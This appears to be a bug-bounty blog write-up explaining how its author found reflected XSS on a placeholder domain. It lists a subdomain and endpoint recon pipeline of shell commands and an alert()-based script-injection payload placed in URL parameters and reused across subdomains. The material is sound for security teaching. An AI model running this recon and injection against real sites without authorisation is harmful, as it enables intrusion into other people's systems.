How i got easy multiple RXSS
السلام عليكم
Assalamualaikum , guys! my name is Abdelrahem mekky (0xmekky) I have found multiple Reflected XSS vulnerabilities
If you do not know what xss is, you can understand it here
Let’s explain how I found multiple RXSS vulnerabilities
1-After extracting and collecting the subdomains using the SubEnum tool
subenum -d target.com -r
2- Now Let’s Gather the endpoints from Wayback Machine and Common Crawl
I will use the katana tool and Wayback machine
cat subdomians.txt | katana -jc >> Endpoints.txt
cat subdomians.txt | waybackurls >> Endpoints.txt
3-Because most of them would be duplicated, we would get rid of them with uro tool
cat Enpoints.txt | uro >> Endpoints_Final.txt
4- getting the endpoints that have parameters which maybe vulnerable to XSS using gf tool
cat Endpoints_Final.txt | gf xss >> XSS.txt
5-Then we will use the Gxss tool for finding parameters whose values are reflected in the response
cat XSS.txt | Gxss -p khXSS -o XSS_Reflected.txt
After finding the parameter values are reflected in the response
6-Let’s get started with Manual Testing
https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
7-You can inject any JavaScript payload and it will execute e.g
JavaScript payload :- mekky2><script>alert("0xmekky")</script>
URL :-https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
8-I noticed in the SubDomains file that there are many SubDomains for SubSubDomain
e.g.
SubSubDomaine :- subsub.test.exap.com
SubDomains for SubSubDomain :-
1- new.subsub.test.exap.com
2- new2.subsub.test.exap.com
3- new3.subsub.test.exap.com
etc.........................................
9-Filter the file and search for a specific value to extract everything underneath subsub.test.exap.com using grep
cat subdomians.txt | grep "subsub.test.exap.com"
The result
new.subsub.test.exap.com
new2.subsub.test.exap.com
new3.subsub.test.exap.com
I also noticed that it is the same page as subsub.test.exap.com
10-After collecting the subdomains as above
new.subsub.test.exap.com
new2.subsub.test.exap.com
new3.subsub.test.exap.com
I tried adding Endpoint to all subdomains
new.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
new2.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
new3.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
The payload has been successfully executed in subdomains